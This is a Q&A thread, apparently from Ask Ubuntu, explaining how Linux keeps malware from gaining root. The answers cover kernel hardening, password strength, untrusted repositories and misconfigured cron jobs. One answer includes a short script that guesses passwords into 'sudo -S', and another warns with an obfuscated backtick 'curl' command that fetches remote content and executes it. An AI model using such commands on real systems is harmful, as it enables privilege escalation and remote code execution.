How is the system kept secure?

I understand that if any malware made it's way into a Linux system, it will, at most, gain a user-level privilege and ruin anything within the particular user's reach, i.e. the user's own files.

But what exactly keeps the malwares from gaining root-level access? Can it not somehow crack the password from within?


Solution 1:

This is a complex question. There are lots of different layers of security in a Ubuntu system, from complex frameworks like AppArmor to humble kernel variables like mmap_min_addr. You can add some kernel features like memory randomization in the mix. You can find a list of them along with a quick explanations on the Ubuntu Wiki.

Another important factor is that the updates are both fast and easy - so most computers will be updated to the last security fixes.

As far as I know, an attacker that has gained local access to your computer has three ways to scale the kernel privileges:

  1. Crack the password. But this is going to be really difficult, the password is stored encrypted, using algorithms with no known flaw. It will take ages to crack it.

  2. Bug in the kernel. But all the security features of the kernel will get in the way.

  3. Trick the user to give away the password, i.e. social engineering. Just show a fake password dialogue or use some other trick. This is the easiest way to do it.

The third point is the weakest vulnerability right now.

Solution 2:

Cracking the root password itself is not possible, because Ubuntu disabled the root user by default. However, if your user can become root through sudo and your password is easy to guess/brute-force, you've an insecure system. Example script trying to test some password:

#!/bin/sh
for pass in password 123 ubuntu pass; do
    echo $pass|sudo -S evil_command
done

Adding an untrusted repository allows programs from that repository be installed. Even if you do not explicitly install an application like sudo apt-get install [app-from-repo], the repository can still affect other programs by making Ubuntu believe that the repository contains a newer version of a certain program.

The update process is run as root, otherwise files could not be written to /usr/bin or /etc. An installation trigger is run as root too and can run arbitrarily, and possibly, harmful commands. Now, do not get worried, manual action is needed to update programs and the Ubuntu repositories are safe. Closed-source software like Windows can never be fully trusted because you cannot check the source for malicious code, but you can review the source of Ubuntu application if you need to (does not apply to proprietary programs like sun-java6 or Flash).

As mentioned by Javier Rivera, kernel bugs can lead to arbitrary code execution, but bugged software are possibly dangerous as well, especially buggy setsuid root binaries (binaries which will run under file owner, root) and other buggy programs running as root.

You can create security holes on your system if you do not pay attention to what you're doing. For example, without fully understanding the concept of cronjobs, you've added a cronjob to /etc/cron.daily which runs a program in your home folder (e.g. /bin/sh /home/your-username/myscript.sh. If the myscript.sh file is writable by you can be deleted by you, an exploit could put malicious code in myscript.sh which would be run as root (privilege escalation).

To stay safe, use your mind! Do not run commands from untrusted sources if you do not know what it does. If someone says run `curl 3221233674` with back-ticks, do not. 3221233674 is another way to write 192.0.32.10 (IP of example.com). So, it would be equal to:

`curl http://example.com/`

Those back-ticks causes the output be executed as shell commands. In plain English, "Download the page http://example.com/ and try to execute the downloaded page".

At first, you wouldn't see something malicious in the given command. But now, you know it can be abused too.

Always check commands/script you get from untrusted sources, like the Internet.